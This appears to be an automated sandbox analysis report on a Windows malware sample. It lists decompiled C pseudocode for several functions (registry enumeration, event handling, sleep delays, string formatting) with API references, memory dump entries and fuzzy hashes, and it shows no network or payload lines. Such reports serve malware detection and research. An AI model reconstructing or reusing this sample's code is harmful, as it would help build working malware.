                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f4899
                                                                                  0x033f48a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f48ad
                                                                                  0x033f48b1
                                                                                  0x033f48b3
                                                                                  0x033f48b8
                                                                                  0x033f48b8
                                                                                  0x033f48c0
                                                                                  0x033f48c5
                                                                                  0x033f48c9
                                                                                  0x033f48cd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f48db
                                                                                  0x033f48df
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f48df
                                                                                  0x00000000
                                                                                  0x033f48e1
                                                                                  0x033f48e1
                                                                                  0x033f48e1
                                                                                  0x033f48e7
                                                                                  0x033f48e9
                                                                                  0x033f48e9
                                                                                  0x033f48ee
                                                                                  0x033f48f3
                                                                                  0x033f48f7
                                                                                  0x033f4909
                                                                                  0x033f4909
                                                                                  0x033f490d
                                                                                  0x033f4913
                                                                                  0x033f4913
                                                                                  0x033f4916
                                                                                  0x033f4918
                                                                                  0x033f491b
                                                                                  0x033f491b
                                                                                  0x033f4922
                                                                                  0x033f4928
                                                                                  0x033f4928

                                                                                  APIs
                                                                                    • Part of subcall function 033F4200: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,033F70CE,74666F53,00000000,?,00000000,?,?,033F79D7), ref: 033F4236
                                                                                    • Part of subcall function 033F4200: lstrcpy.KERNEL32(00000000,00000000), ref: 033F425A
                                                                                    • Part of subcall function 033F4200: lstrcat.KERNEL32(00000000,00000000), ref: 033F4262
                                                                                  • CreateEventA.KERNEL32(033FD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F4877
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • StrChrW.SHLWAPI(033F546D,00000020,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F48A7
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,033F546D,00000000,?,00000000,?,033F546D,?,?,?,?,?,?,?,033F38C3), ref: 033F48D5
                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F4903
                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,033F546D,?,?,?), ref: 033F491B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 73268831-0
                                                                                  • Opcode ID: d9aa1cde8009c0cc9ebfec211abf7159d765b3a849b30c5c3ebfc28bacaeb084
                                                                                  • Instruction ID: 2485cbf63e9ebde869a23d3cfb47366f06a9bc2eb5813e1282b2387e22ecd57e
                                                                                  • Opcode Fuzzy Hash: d9aa1cde8009c0cc9ebfec211abf7159d765b3a849b30c5c3ebfc28bacaeb084
                                                                                  • Instruction Fuzzy Hash: 4F21B736A403566FD721EBAA9CC8B5BB7DDEF48B11FC90625FF01DB244DB65C8018690
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F57B9, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F57B9(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E033F75C4(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E033F4C31(_v28);
							goto L17;
						}
						_t42 = E033FA360(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E033F4C31(_v24);
						_v20 = _v16;
						_t47 = E033F75C4(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x33fd224, 0) == 0x102);
				goto L16;
			}

















                                                                                  0x033f57b9
                                                                                  0x033f57d3
                                                                                  0x033f57d6
                                                                                  0x033f57d9
                                                                                  0x033f57dc
                                                                                  0x033f57df
                                                                                  0x033f57e5
                                                                                  0x033f57e9
                                                                                  0x033f58c3
                                                                                  0x033f58c7
                                                                                  0x033f58c7
                                                                                  0x033f57f2
                                                                                  0x033f57f9
                                                                                  0x033f5800
                                                                                  0x033f5803
                                                                                  0x033f58b8
                                                                                  0x033f58bb
                                                                                  0x00000000
                                                                                  0x033f58c1
                                                                                  0x033f5809
                                                                                  0x033f580c
                                                                                  0x033f5813
                                                                                  0x033f581d
                                                                                  0x033f5826
                                                                                  0x033f582c
                                                                                  0x033f5834
                                                                                  0x033f586c
                                                                                  0x033f58a6
                                                                                  0x033f58ac
                                                                                  0x033f58ae
                                                                                  0x033f58ae
                                                                                  0x033f58b0
                                                                                  0x033f58b3
                                                                                  0x00000000
                                                                                  0x033f58b3
                                                                                  0x033f5881
                                                                                  0x033f5886
                                                                                  0x033f588a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f588a
                                                                                  0x033f5839
                                                                                  0x033f5848
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f584d
                                                                                  0x033f5856
                                                                                  0x033f5859
                                                                                  0x033f5860
                                                                                  0x033f5863
                                                                                  0x033f583e
                                                                                  0x033f583e
                                                                                  0x00000000
                                                                                  0x033f583e
                                                                                  0x033f5867
                                                                                  0x00000000
                                                                                  0x033f5867
                                                                                  0x033f583b
                                                                                  0x00000000
                                                                                  0x033f588c
                                                                                  0x033f5899
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,033F544E,?), ref: 033F57DF
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • RegEnumKeyExA.KERNELBASE(?,?,?,033F544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,033F544E), ref: 033F5826
                                                                                  • WaitForSingleObject.KERNEL32(00000000,?,?,?,033F544E,?,033F544E,?,?,?,?,?,033F544E,?), ref: 033F5893
                                                                                  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,033F544E,?,?,?,?,?,033F38C3,?), ref: 033F58BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 3664505660-0
                                                                                  • Opcode ID: 208d8b92e69636ee4f5c659902c3b9c477cd3ff5bc727d340b5a58868d8a5897
                                                                                  • Instruction ID: 66ec0aa77f71913df72beed40034d1ed24c621a697fa8489c1ac1a968dc553a5
                                                                                  • Opcode Fuzzy Hash: 208d8b92e69636ee4f5c659902c3b9c477cd3ff5bc727d340b5a58868d8a5897
                                                                                  • Instruction Fuzzy Hash: 35313776E0021DBFEF21EBA5CCC49EEFEBDEB45741F944066E621B2250D2744A409B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F8861, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 033F88B8
                                                                                  • SysAllocString.OLEAUT32(033FA412), ref: 033F88FB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F890F
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F891D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 344208780-0
                                                                                  • Opcode ID: 7b033c7100e1814124ea48b893674be760d22da0f9910bbc592292e214514a84
                                                                                  • Instruction ID: ccbe500ad18cb19066329fcc39e6fc8f36b5750d3ccad638664d01e4524c64da
                                                                                  • Opcode Fuzzy Hash: 7b033c7100e1814124ea48b893674be760d22da0f9910bbc592292e214514a84
                                                                                  • Instruction Fuzzy Hash: 35311E76900109EFCB09DF98D8C48AEBBB9FF48340B54856EFA069B210E7359645CF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F53BE, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 41%
                                                                                  			E033F53BE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E033F8A0C(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E033F5758(_t23);
						}
					}
					return _t38;
				}
				_t26 = E033F6D86(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x33fd234, 1, 0,  *0x33fd2f8);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E033F57B9(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E033FA360(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E033F30BF(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E033F4838( &_v32, _t39);
					goto L13;
				}
			}














                                                                                  0x033f53be
                                                                                  0x033f53cb
                                                                                  0x033f53d1
                                                                                  0x033f53d2
                                                                                  0x033f53d3
                                                                                  0x033f53d4
                                                                                  0x033f53d5
                                                                                  0x033f53d9
                                                                                  0x033f53e0
                                                                                  0x033f53e5
                                                                                  0x033f53e9
                                                                                  0x033f5471
                                                                                  0x033f5471
                                                                                  0x033f5474
                                                                                  0x033f5476
                                                                                  0x033f547e
                                                                                  0x033f5484
                                                                                  0x033f5487
                                                                                  0x033f5487
                                                                                  0x033f5484
                                                                                  0x033f5492
                                                                                  0x033f5492
                                                                                  0x033f53f5
                                                                                  0x033f53fc
                                                                                  0x033f53fe
                                                                                  0x033f53fe
                                                                                  0x033f5415
                                                                                  0x033f5419
                                                                                  0x033f541c
                                                                                  0x033f5427
                                                                                  0x033f542e
                                                                                  0x033f542e
                                                                                  0x033f543a
                                                                                  0x033f543b
                                                                                  0x033f5449
                                                                                  0x033f543d
                                                                                  0x033f543d
                                                                                  0x033f543e
                                                                                  0x033f543f
                                                                                  0x033f5440
                                                                                  0x033f5441
                                                                                  0x033f5442
                                                                                  0x033f5442
                                                                                  0x033f544e
                                                                                  0x033f5453
                                                                                  0x033f5455
                                                                                  0x033f5457
                                                                                  0x033f5457
                                                                                  0x033f545e
                                                                                  0x00000000
                                                                                  0x033f5460
                                                                                  0x033f5460
                                                                                  0x033f546d
                                                                                  0x00000000
                                                                                  0x033f546d

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(033FD234,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,033F38C3,?,00000001), ref: 033F540F
                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F541C
                                                                                  • Sleep.KERNELBASE(00000BB8,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F5427
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,033F38C3,?,00000001,033F7A05,00000002,?,?,033F7A05), ref: 033F542E
                                                                                    • Part of subcall function 033F57B9: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,033F544E,?), ref: 033F57DF
                                                                                    • Part of subcall function 033F57B9: RegEnumKeyExA.KERNELBASE(?,?,?,033F544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,033F544E), ref: 033F5826
                                                                                    • Part of subcall function 033F57B9: WaitForSingleObject.KERNEL32(00000000,?,?,?,033F544E,?,033F544E,?,?,?,?,?,033F544E,?), ref: 033F5893
                                                                                    • Part of subcall function 033F57B9: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,033F544E,?,?,?,?,?,033F38C3,?), ref: 033F58BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 780868161-0
                                                                                  • Opcode ID: b3ff365e918f0f46a5bd231fb253e28fdc4a49cf9f3eb486b1e1b3b9bdc839c6
                                                                                  • Instruction ID: 839da6bcf9757aaaadc648042174b35bc7463875581925f837901dc5f7932ec1
                                                                                  • Opcode Fuzzy Hash: b3ff365e918f0f46a5bd231fb253e28fdc4a49cf9f3eb486b1e1b3b9bdc839c6
                                                                                  • Instruction Fuzzy Hash: 39218076D00619AFDB10FFA688C48AEB3ADEF06352BC94465EB11EB100D734D9858BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4E6B, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 78%
                                                                                  			E033F4E6B(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E033F75C4(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                  0x033f4e77
                                                                                  0x033f4e7b
                                                                                  0x033f4e7c
                                                                                  0x033f4e7d
                                                                                  0x033f4e7f
                                                                                  0x033f4e81
                                                                                  0x033f4e86
                                                                                  0x033f4e89
                                                                                  0x033f4f20
                                                                                  0x033f4f27
                                                                                  0x033f4f27
                                                                                  0x033f4e92
                                                                                  0x033f4e99
                                                                                  0x033f4ea9
                                                                                  0x033f4ea9
                                                                                  0x033f4eaf
                                                                                  0x033f4eb1
                                                                                  0x033f4eb6
                                                                                  0x033f4ebf
                                                                                  0x033f4ec7
                                                                                  0x033f4eca
                                                                                  0x033f4ed5
                                                                                  0x033f4ed9
                                                                                  0x033f4edb
                                                                                  0x033f4edc
                                                                                  0x033f4ee5
                                                                                  0x033f4ee9
                                                                                  0x033f4efa
                                                                                  0x033f4eeb
                                                                                  0x033f4ef0
                                                                                  0x033f4ef5
                                                                                  0x033f4f04
                                                                                  0x033f4f04
                                                                                  0x033f4ed9
                                                                                  0x033f4f0a
                                                                                  0x033f4f10
                                                                                  0x033f4f10
                                                                                  0x033f4f19
                                                                                  0x033f4f1e
                                                                                  0x033f4f1e
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000000C8), ref: 033F4E99
                                                                                  • lstrlenW.KERNEL32(?), ref: 033F4ECF
                                                                                  • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 033F4EF0
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F4F04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1198164300-0
                                                                                  • Opcode ID: 3c64ef03801e92dae1366cbe6133c236ded14a9f393975fd45b16b17031055a1
                                                                                  • Instruction ID: 525b2dd1442be73289dce393d75df8179db12744a7f15335951a4dd14dbab6a6
                                                                                  • Opcode Fuzzy Hash: 3c64ef03801e92dae1366cbe6133c236ded14a9f393975fd45b16b17031055a1
                                                                                  • Instruction Fuzzy Hash: E6213075E01209EFCB10DFA9D8C49AFBBB8FF49345B5441A9EA05E7214E730DA41CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4C46, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4C46() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t54;

				_v12 = 0;
				_t23 = E033F6D86(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x33fd230; // 0x2b2a5a8
				_t4 = _t24 + 0x33fed80; // 0x5f29328
				_t5 = _t24 + 0x33fed28; // 0x4f0053
				_t26 = E033F4195( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x33fd230; // 0x2b2a5a8
						_t11 = _t32 + 0x33fed74; // 0x5f2931c
						_t48 = _t11;
						_t12 = _t32 + 0x33fed28; // 0x4f0053
						_t54 = E033F7AC8(_t11, _t12, _t11);
						_t58 = _t54;
						if(_t54 != 0) {
							_t35 =  *0x33fd230; // 0x2b2a5a8
							_t13 = _t35 + 0x33fedbe; // 0x30314549
							if(E033F5BC3(_t48, _t58, _v8, _t54, _t13, 0x14) == 0) {
								_t60 =  *0x33fd214 - 6;
								if( *0x33fd214 <= 6) {
									_t42 =  *0x33fd230; // 0x2b2a5a8
									_t15 = _t42 + 0x33febda; // 0x52384549
									E033F5BC3(_t48, _t60, _v8, _t54, _t15, 0x13);
								}
							}
							_t38 =  *0x33fd230; // 0x2b2a5a8
							_t17 = _t38 + 0x33fedb8; // 0x5f29360
							_t18 = _t38 + 0x33fed90; // 0x680043
							_t40 = E033F3FF3(_v8, 0x80000001, _t54, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x33fd1f0, 0, _t54);
						}
					}
					HeapFree( *0x33fd1f0, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E033F30BF(_t53);
				}
				return _t45;
			}

















                                                                                  0x033f4c56
                                                                                  0x033f4c59
                                                                                  0x033f4c60
                                                                                  0x033f4c62
                                                                                  0x033f4c62
                                                                                  0x033f4c65
                                                                                  0x033f4c6a
                                                                                  0x033f4c71
                                                                                  0x033f4c7e
                                                                                  0x033f4c83
                                                                                  0x033f4c87
                                                                                  0x033f4c95
                                                                                  0x033f4ca3
                                                                                  0x033f4ca7
                                                                                  0x033f4d38
                                                                                  0x033f4d38
                                                                                  0x033f4cad
                                                                                  0x033f4cad
                                                                                  0x033f4cb2
                                                                                  0x033f4cb2
                                                                                  0x033f4cb9
                                                                                  0x033f4cc5
                                                                                  0x033f4cc7
                                                                                  0x033f4cc9
                                                                                  0x033f4ccb
                                                                                  0x033f4cd2
                                                                                  0x033f4ce4
                                                                                  0x033f4ce6
                                                                                  0x033f4ced
                                                                                  0x033f4cef
                                                                                  0x033f4cf6
                                                                                  0x033f4d01
                                                                                  0x033f4d01
                                                                                  0x033f4ced
                                                                                  0x033f4d06
                                                                                  0x033f4d0b
                                                                                  0x033f4d12
                                                                                  0x033f4d22
                                                                                  0x033f4d30
                                                                                  0x033f4d32
                                                                                  0x033f4d32
                                                                                  0x033f4cc9
                                                                                  0x033f4d44
                                                                                  0x033f4d44
                                                                                  0x033f4d46
                                                                                  0x033f4d4b
                                                                                  0x033f4d4d
                                                                                  0x033f4d4d
                                                                                  0x033f4d58

                                                                                  APIs
                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05F29328,00000000,?,73BCF710,00000000,73BCF730), ref: 033F4C95
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05F29360,?,00000000,30314549,00000014,004F0053,05F2931C), ref: 033F4D32
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,033F3858), ref: 033F4D44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: cfe14968d8744c34ac32d0fa366ebb379efce049da3ac015e54f019bbd013750
                                                                                  • Instruction ID: 16d401171c860051363d9943bd03de900203069a157de558ee0cb2d7057267dc
                                                                                  • Opcode Fuzzy Hash: cfe14968d8744c34ac32d0fa366ebb379efce049da3ac015e54f019bbd013750
                                                                                  • Instruction Fuzzy Hash: 4C31B135900208BFDB11EF95DDC8EAA7BBCEF44310F990265FA01AB165D770DA059BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F80F6, Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 90%
                                                                                  			E033F80F6(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x33fd230; // 0x2b2a5a8
				_t2 = _t22 + 0x33fe671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x33fd204 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x33fd204 =  *0x33fd204 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E033F5AC5(_t49, _t48); // executed
					_t33 = E033F74F4(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x33fd204 < 5) {
							 *0x33fd204 =  *0x33fd204 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E033F53A8();
					HeapFree( *0x33fd1f0, 0, _t48);
					goto L9;
				}
				_t50 =  *0x33fd2f4; // 0x5f28d6c
				if(RtlAllocateHeap( *0x33fd1f0, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E033F3CC4(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}















                                                                                  0x033f80f6
                                                                                  0x033f80fd
                                                                                  0x033f8104
                                                                                  0x033f8108
                                                                                  0x033f810d
                                                                                  0x033f8118
                                                                                  0x033f8128
                                                                                  0x033f816b
                                                                                  0x033f816f
                                                                                  0x033f8173
                                                                                  0x033f8174
                                                                                  0x033f8177
                                                                                  0x033f817c
                                                                                  0x033f817c
                                                                                  0x033f817f
                                                                                  0x033f8183
                                                                                  0x033f81bd
                                                                                  0x033f81bd
                                                                                  0x033f81c3
                                                                                  0x033f81ca
                                                                                  0x033f81ca
                                                                                  0x033f8185
                                                                                  0x033f8188
                                                                                  0x033f818a
                                                                                  0x033f8197
                                                                                  0x033f8199
                                                                                  0x033f81a0
                                                                                  0x033f81d7
                                                                                  0x033f81dc
                                                                                  0x033f81de
                                                                                  0x033f81e0
                                                                                  0x033f81e0
                                                                                  0x00000000
                                                                                  0x033f81de
                                                                                  0x033f81a2
                                                                                  0x033f81a9
                                                                                  0x033f81b7
                                                                                  0x00000000
                                                                                  0x033f81b7
                                                                                  0x033f812a
                                                                                  0x033f8145
                                                                                  0x033f815f
                                                                                  0x00000000
                                                                                  0x033f815f
                                                                                  0x033f8158
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 033F8118
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F813D
                                                                                    • Part of subcall function 033F3CC4: GetTickCount.KERNEL32 ref: 033F3CDB
                                                                                    • Part of subcall function 033F3CC4: wsprintfA.USER32 ref: 033F3D28
